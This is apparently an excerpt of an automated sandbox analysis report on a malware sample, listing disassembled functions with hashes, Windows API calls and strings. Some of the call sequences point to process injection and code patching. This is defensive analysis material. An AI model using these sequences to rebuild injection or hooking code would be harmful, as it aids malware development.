  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
  • Opcode ID: 7d6f6f6309830c53eb87eb1248ac9b1ade3661ad178ea1527cba377d544f1ce2
  • Instruction ID: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
  • Opcode Fuzzy Hash: BDE068961F0CC4E2C49844CC6273B01E3200FA055ACDDE72036A8340637A20F51DCBA4
  • Instruction Fuzzy Hash: 1818fd78c2c0a364e7614ca651566d831b80b8fadd13cef08670214cb7cc6660
APIs
  • memset.NTDLL ref: 01B313B5
    • Part of subcall function 01B33340: GetProcAddress.KERNEL32(01B3866B,01B345D9,00000000,01B3618C,00000000,00000000,?,?,?,01B311A6,?,01B3618C,00000000,00000000), ref: 01B33354
  • GetLastError.KERNEL32(00000001), ref: 01B31422
  • HeapFree.KERNEL32(00000000,00000000), ref: 01B31433
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C28FD, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 55registrystring
Similarity
  • Total matches: 55
  • API ID: RegCloseKeyRegOpenKeylstrcmpilstrlen
  • String ID:
  • API String ID: 352456400-0
  • Opcode ID: 9381e8ebef87ae03ea2b4a3254f2d425f4b44f3dd01b09b1a235e089a5947b32
  • Instruction ID: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
  • Opcode Fuzzy Hash: 71E02B73858AC38A80833424A43A7B7D714AF102D794D2717E9849E1057F9631AA7B66
  • Instruction Fuzzy Hash: 3340fcdebc58507e8e86f06db5e918e9917dfd510c30d8231bbc151ec4750938
APIs
  • RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001D9A9C: RegCloseKey.ADVAPI32(?,00000000), ref: 001D9B23
  • lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
  • lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
  • RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D799E, Relevance: 6.1, APIs: 4, Instructions: 68 Total matches: 87string
Similarity
  • Total matches: 87
  • API ID: GetModuleHandleStrChrlstrcpylstrlen
  • String ID:
  • API String ID: 2222289486-0
  • Opcode ID: 864a615e2bbc61195937544d5275c128a98c955975673d031bfe47106b2bd609
  • Instruction ID: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
  • Opcode Fuzzy Hash: B6E0AB26038D8847CEF7D444210378A8600BB91189C9EE720EC51605830F0032D3E90B
  • Instruction Fuzzy Hash: 10d50f8fd244a0bfecad63574883675bbb95b3416fa8ed843a079fc93f672d35
APIs
  • lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
  • StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
  • GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
    • Part of subcall function 001D7A61: VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
    • Part of subcall function 001D7A61: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
    • Part of subcall function 001D7A61: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D7A61: GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DD885, Relevance: 6.1, APIs: 4, Instructions: 61 Total matches: 76memorystring
Similarity
  • Total matches: 76
  • API ID: memcpy$RtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 3529742955-0
  • Opcode ID: e8f8f21a638fa0bf49e5fc9491458e8ae2be9dfe9c76977686a4510d875031ce
  • Instruction ID: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
  • Opcode Fuzzy Hash: 8EE07D71CD4A10C0A007C448A9103BAF35F6840293E0CE570EC01F690F0BD2A1F0035B
  • Instruction Fuzzy Hash: 3b695c71ec863cc8ce7b4d787fb629d2f3f8d76e2dc9e5de00ced60dcd215824
APIs
  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD890
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001DD8A8
  • memcpy.NTDLL(00000000,?,-00000008,?,?,?,001DDA52,00000000,?,?,001DE01A,?,001EB1C4), ref: 001DD8EC
  • memcpy.NTDLL(00000001,?,00000001), ref: 001DD90D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D7471, Relevance: 6.1, APIs: 4, Instructions: 59 Total matches: 43stringthreadtime
Similarity
  • Total matches: 43
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamelstrcpy
  • String ID:
  • API String ID: 3418835849-0
  • Opcode ID: 48e92af7de5b1f14262d718c1bb04bd461a0a548bd9a3e9d293402e4cb923fe1
  • Instruction ID: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
  • Opcode Fuzzy Hash: 46D02B399919C4FB492B4468141036A4C8128283DD14C3553FC21055457F02318D3F26
  • Instruction Fuzzy Hash: 28715601aaafb22b36b215bc7c5ba57760e8370145e7159df0df034c56fa7ec5
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
  • lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2554, Relevance: 6.1, APIs: 4, Instructions: 54 Total matches: 57memorystringtime
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 407846186-0
  • Opcode ID: 703a57e9545ddbfd879067786fd798182cf2c7cd56fd51e5cdfbf21bb808e58b
